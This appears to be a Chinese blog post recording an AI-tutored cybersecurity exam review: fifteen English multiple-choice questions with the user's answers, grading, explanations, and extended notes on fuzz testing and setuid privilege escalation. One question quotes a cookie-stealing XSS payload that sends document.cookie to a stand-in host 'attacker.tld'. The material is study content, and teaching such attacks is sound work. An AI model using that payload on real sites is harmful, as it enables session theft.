5618选择题复习3
本文最后由方少年更新于2025 年 11 月 20 日,已超过10天没有更新。如果文章内容或图片资源失效,请留言反馈,将会及时处理,谢谢!
好的,按照你的最新要求,我不会在输出中透露任何答案或答案分布。下面是15道英文选择题(每题只有一个正确选项),题目难度与知识点参考了你提供的 sample exam。请在每题后的【】中填写你的作答字母(A/B/C/D),提交后我会批改并给出解析。
- In the OSI model, which layer is primarily responsible for data representation tasks such as encryption and compression during transmission?
a) Transport
b) Network
c) Data Link
d) Presentation
【D】 - Which statement best captures the legal boundary for conducting cybersecurity activities on target systems?
a) Actions are legal if the intent is educational
b) Actions require explicit authorization from the owner or authority
c) Actions are allowed if they cause no visible damage
d) Actions are acceptable if commonly practiced in the industry
【A】 - You must publish two internal services (HTTP and SMTP) via a single public IP, mapping different public ports to different internal hosts. Which approach should you use?
a) Port Address Translation (PAT)
b) DHCP relay
c) Static routing
d) DNS round-robin
【A】 - A tester injects random malformed inputs into a web form to observe crashes or unexpected behavior. Which testing method is being used?
a) Regression testing
b) Unit testing
c) Fuzz testing
d) Static analysis
【C】- - A user runs a root-owned binary that sets the process’s effective UID to root, allowing privileged actions without using sudo. Which mechanism is most likely in play?
a) Misconfigured cron job
b) Misconfigured sudoers file
c) Setgid bit
d) Setuid bit
【B】- - You can SSH into a bastion host on the company network, but the internal web app is not exposed externally. Which technique creates a direct tunnel from a local port to the app’s host:port without changing browser proxy settings?
a) SSH local port forwarding
b) SSH reverse port forwarding
c) VPN tunneling all traffic
d) SSH dynamic port forwarding (SOCKS)
【A】 A comment field reflects the following payload to other users:
<script>document.location='http://attacker.tld/steal?c='+document.cookie</script>Which vulnerability is being exploited?
a) SQL Injection
b) Cross-Site Request Forgery (CSRF)
c) Cross-Site Scripting (XSS)
d) Remote Code Execution
【C】- A team wants to find security flaws by analyzing source code before compilation or runtime. Which method fits best?
a) Dynamic Application Security Testing (DAST)
b) Static Application Security Testing (SAST)
c) Fuzz testing-
d) Penetration testing-
【B】 - Which statement correctly distinguishes a SOCKS proxy from a traditional web proxy?
a) SOCKS can only handle HTTP/HTTPS; web proxies handle any protocol
b) Web proxies operate at a lower network layer than SOCKS
c) SOCKS works only with web browsers
d) Web proxies are generally optimized for HTTP(S), while SOCKS can proxy a wider range of protocols (e.g., FTP, SMTP)
【D】 - Which statement about signature-based malware detection is most accurate?
a) It detects known malware effectively but is weak against zero‑day variants lacking signatures
b) It reliably detects obfuscated and zero‑day malware without needing updates
c) It requires no frequent signature updates to remain effective
d) It is the only practical endpoint detection method in modern environments
【A】 - Which tool is primarily used for fast enumeration of web directories and files by brute-forcing paths?
a) Hydra
b) Gobuster
c) Metasploit
d) Netcat
【B】 - Which scenario best describes horizontal privilege escalation?
a) A standard user gains root access on a Linux server
b) A standard user gains administrative privileges on the same system
c) An administrator grants themselves additional system-wide permissions
d) One regular user gains access to another regular user’s account/data
【C】 - What is the primary purpose of AndroidManifest.xml in an Android app?
a) To provide essential app metadata to the system and declare required permissions
b) To define the app’s UI layouts and view hierarchies
c) To store the app’s images and other graphical assets
d) To define the app’s internal database schema
【A】 - What is the main purpose of a chain of custody protocol in digital forensics?
a) To manage user access control policies for endpoints
b) To ensure evidence is properly handled and documented to prevent tampering
c) To store and rotate encryption keys for sensitive data
d) To automate malware triage in incident response
【B】 - During a secure file transfer, encryption is applied at the sender, but the receiver cannot decrypt despite no network errors. At which OSI layer should troubleshooting begin?
a) Transport
b) Network
c) Presentation
d) Data Link
【C】
批改结果(不直接给出标准选项字母)
总分:12 / 15
逐题判定与解析:
- 正确。解析:OSI 表示层(第 6 层)负责数据表示、加解密与压缩等。
- 错误。解析:从事网络安全操作的合法性核心在于获得资源所有者/授权方的明确授权;“出于学习目的”并不构成合法依据。
- 正确。解析:通过端口地址转换/端口转发,将同一公网 IP 的不同端口映射到不同的内网主机与服务。
- 正确。解析:向输入投喂随机/畸形数据以观察异常或崩溃属于模糊测试(fuzzing)。
- 错误。解析:描述的是启用了 SUID 的 root 所有二进制,使进程“有效 UID”成为 root;sudoers 仅影响通过 sudo 执行时的授权策略。
- 正确。解析:本地端口转发把本机端口直连到内网目标的 host:port,无需改浏览器代理设置。
- 正确。解析:注入脚本在其他用户浏览器执行并窃取 Cookie,典型跨站脚本(XSS)场景。
- 正确。解析:SAST 在编译/运行前静态分析源代码发现缺陷;DAST 是运行期黑盒测试。
- 正确。解析:SOCKS 是通用代理,可转发多种协议;传统 Web 代理主要面向 HTTP/HTTPS 并常带缓存/过滤能力。
- 正确。解析:基于签名的方法对已知样本有效,但对零日/变种(无签名)较弱,需频繁更新。
- 正确。解析:Gobuster 用字典高速枚举目录/文件;Hydra 是口令暴力/字典破解;Netcat 是通用网络工具;Metasploit 偏向利用框架。
- 错误。解析:水平越权是同级别账户间的横向访问(如普通用户访问另一普通用户的数据);你所选情形属于纵向权限提升。
- 正确。解析:AndroidManifest 声明应用组件、权限与元数据,供系统识别与调度。
- 正确。解析:证据“保全链”通过记录与签名确保采集、转移、存储、分析等环节可审计、可验证、不可篡改。
- 正确。解析:加密/解密与编码不一致应从表示层排查(算法、密钥、模式、编码等),而非网络/传输层。
错题速记与巩固建议:
- 授权边界:一切以“明确授权”为准,意图不等于合法。
- SUID vs sudo:SUID 影响二进制直接执行时的“有效 UID”;sudo 受 sudoers 策略控制。
- 水平 vs 垂直越权:水平=同级账户之间;垂直=跨权限等级(普通→管理员/root)。
没问题!下面分别把两题的核心概念、为何是/不是其他选项、以及实务和考试要点讲清楚。
题 1:向表单注入随机畸形输入属于哪种测试方法?
一句话结论:这是模糊测试(Fuzz testing)。
核心定义
- Fuzz testing:自动或半自动地向目标接口/程序提供随机、畸形或越界的输入(payload),观察是否出现崩溃、异常行为或安全漏洞。目标是触发未知缺陷(如越界写、UAF、异常处理缺陷等)。
- 典型信号:500/异常返回码、崩溃/core dump、CPU/内存异常、超时挂起、日志中的未处理异常。
为什么不是其他选项
- Regression testing(回归测试):用一组固定、事先定义好的用例,验证修改没有引入“旧问题”。不追求随机畸形输入。
- Unit testing(单元测试):针对函数/模块的小而确定性的测试,用例是人工设计的,且有明确预期输出。
- Static analysis(静态分析):不运行程序,通过语法/数据流/控制流等分析源代码或二进制来找缺陷。
实务要点(面向 Web 表单/接口)
- 输入向量:表单字段、URL 参数、JSON/XML body、文件上传、Header、Cookie。
- 负载类型:超长字符串、边界值(-1、2^31-1…)、格式串符号%、特殊字节、随机字节、协议语法畸形、嵌套过深、压缩炸弹等。
- 监控:应用日志、崩溃日志、HTTP 5xx 比例、响应时间分布、容器/进程重启次数。
- 工具与方法:黑盒/基于代理的 Fuzz(如 ZAP fuzzer、Burp Intruder/Turbo Intruder),协议/文件格式 Fuzz(boofuzz、Peach),覆盖引导型(AFL++、libFuzzer、Honggfuzz,需编译插桩)。
- 最佳实践:在隔离测试环境进行;配合 ASan/UBSan/LSan 等 Sanitizer 提升崩溃可见性;保留并最小化触发样本,便于复现和修复。
考试抓关键词
- “random/invalid/malformed inputs”“observe crashes/unexpected behavior”=Fuzz testing。
题 2:普通用户执行一个 root 拥有的二进制,进程的有效 UID 变成 root,从而获得高权限(没有用 sudo)
一句话结论:这是 setuid 机制在起作用(而非 sudoers/cron/setgid)。
核心概念(Linux 权限模型)
- 实际用户 ID(RUID):你是谁(登录用户)。
- 有效用户 ID(EUID):你以谁的身份在“执行权限检查”(决定你能做什么)。
- setuid 位:当一个可执行文件设置了 setuid 且文件所有者为 root,用户执行它时,进程的 EUID 会被设置为该文件的所有者(root),从而在该进程内拥有 root 级权限。
- 经典示例:/bin/passwd 通常为 root:root,权限位中带 s,允许普通用户修改自己的密码,因为修改 /etc/shadow 需要高权限。
如何识别
- 文件权限显示中,所有者执行位位置出现 s(小写 s 表示拥有执行位且开启 setuid;大写 S 表示未给执行位但设置了 setuid):
-rw s r-x r-x root root ... ← 用户位上的 s 表示 setuid - 设置/取消:chmod u+s /path/to/bin 与 chmod u-s /path/to/bin(概念了解即可,生产需审慎)。
- 文件权限显示中,所有者执行位位置出现 s(小写 s 表示拥有执行位且开启 setuid;大写 S 表示未给执行位但设置了 setuid):
为什么不是其他选项
- Misconfigured sudoers file(sudoers 误配):只有在通过 sudo 执行命令时才生效;题干明确“未使用 sudo”。
- Setgid bit:更改的是“有效组 ID”(EGID),常用于共享组或目录继承,与获得 root 用户身份不同。
- Misconfigured cron job:定时任务调度,和“执行某个二进制立即获得 root 身份”不是同一机制。
安全影响与防护要点
- 影响:任何可被利用的 setuid root 程序都可能成为提权入口(缓冲区溢出、命令注入、环境变量滥用等)。
缓解:
- 最小化 setuid root 程序数量,能用 Linux capabilities(例如 cap_net_raw 给 ping)就不用 setuid。
- 对需要短暂提权的程序实施“特权分离/及时降权”(先完成需要 root 的动作,随后 seteuid() 降回普通用户)。
- 严格净化环境变量与 PATH;在挂载点使用 nosuid 选项(防止可移动介质上的 setuid 生效)。
- 加强代码审计与更新,启用编译期与运行期防护(PIE/ASLR/Stack Protector/Sanitizers)。
考试抓关键词
- “effective UID becomes root when executing a root-owned binary without sudo”=setuid。
- 看到“没有用 sudo 但执行二进制就高权限”,基本排除 sudoers/cron;“组权限变化”提示的是 setgid 而非 root 提权。
如果你愿意,我可以给你各出1-2道同知识点的变体练习,帮助你进一步巩固。
文章标题:5618选择题复习3
文章链接:https://www.fangshaonian.cn/archives/142/
最后编辑:2025 年 11 月 20 日 18:36 By 方少年
许可协议: 署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)